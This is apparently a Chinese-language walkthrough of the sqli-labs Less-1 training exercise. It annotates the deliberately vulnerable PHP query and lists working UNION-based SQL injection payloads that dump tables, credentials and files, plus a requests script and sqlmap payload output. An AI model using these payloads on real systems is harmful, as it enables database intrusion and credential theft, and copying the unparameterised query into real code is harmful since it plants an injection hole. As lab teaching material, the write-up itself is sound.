sqli-lab-less1

sqli-lab-less1
一、靶标地址

#Less-1 **Error Based- String
#字符型基于报错的SQL注入
http://192.168.128.140/sqli/less-1/

二、漏洞探测

http://192.168.128.140/sqli/less-1/?id=1'
#报错
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,2' at line 1
#单引号里面的是报错的语句 '1'' LIMIT 0,2
#通过报错猜测后面的语句为 where id='$id' limit 0,2

http://192.168.128.140/sqli/less-1/?id=1"
#正常回显
#select * from users where id='1"' limit 0,1;	//此语句正常回显

http://192.168.128.140/sqli/less-1/?id=1
#正常回显
#select * from users where id='1' limit 0,1;

三、源码分析

#lesson-1做最详细的分析
#index.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
##告知Web浏览器页面使用的HTML版本
<html xmlns="http://www.w3.org/1999/xhtml">
#xhtml命名空间，类似声明
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-1 **Error Based- String**</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">

//核心代码
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
#先执行该文件再接下来执行
error_reporting(0);
// take the variables
#isset() 函数用于检测变量是否已设置并且非 NULL。
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
#写入文本之中
fclose($fp);

// connectivity 

#漏洞语句部分!!!
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
#mysql_query()函数执行一条MySQL查询。
$row = mysql_fetch_array($result);
#mysql_fetch_array()函数从结果集中取得一行（一般为第一行）作为数字数组或关联数组，返回的类型类似于字典

	if($row)
	{
  	echo "<font size='5' color= '#99FF00'>";
  	echo 'Your Login name:'. $row['username'];
  	echo "<br>";
  	echo 'Your Password:' .$row['password'];
  	echo "</font>";
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	print_r(mysql_error());
	echo "</font>";  
	}
}
	else { echo "Please input the ID as parameter with numeric value";}

?>
</font> </div></br></br></br><center>
#<div>标签定义HTML文档中的一个分隔区块或者一个区域部分。
#</br>换行
<img src="../images/Less-1.jpg" /></center>
</body>
</html>

四、黑盒与白盒测试

#白盒测试
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);#打印第一行，所以查询时第一行应为空所以为-1

$id = "-1' --+"
$sql="SELECT * FROM users WHERE id='-1' --+' LIMIT 0,1";

#黑盒测试
#判断当期数据表的列数
$id="-1' order by 3 --+"
#当期用户名和数据库名   
$id="-1' union select 1,user(),database() --+"
#查询表名
$id="-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'  --+"
#information_schema是MySQL特有数据库,tables是其中的一个表名，table_name是其中一个列名，包含了所有数据表.table_schema是数据库名。
#查询列名
$id="-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+"
#查询具体列数据
$id="-1' union select 1,2,group_concat(username) from users --+"
$id="-1' union select 1,2,group_concat(password) from users --+"
#读取文件
$id="-1' union select 1,2,load_file("C:\\flag.txt") --+"
#show global variables like '%secure%'; 
#secure_file_priv为空才可以读取

五、脚本撰写

import requests

url="http://192.168.128.140/sqli/less-1/index.php?id=-1"
#F12查看或者burpsuite抓包
header={
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36'，'Accept-Language': 'en-US,en;q=0.9',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
}
payload="'--+"
response=requests.get(url+payload,headers=header)
print(response.text)
#根据回显来确定

六、sqlmap

sqlmap -u http://192.168.128.140/sqli/less-1/index.php?id=1

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 1921=1921 AND 'DyCe'='DyCe

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 8164 FROM(SELECT COUNT(*),CONCAT(0x7178717671,(SELECT (ELT(8164=8164,1))),0x7162707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'btrk'='btrk

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 4192 FROM (SELECT(SLEEP(5)))gNSF) AND 'TsEE'='TsEE

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5077' UNION ALL SELECT NULL,NULL,CONCAT(0x7178717671,0x4246496479524e454155766e4d464c766d59614f5741527569684b53414a74706c437850454f4741,0x7162707171)-- -

七、总结

1、less-1提交的参数是单引号括起来的。
2、需要熟练掌握漏洞点的利用方式。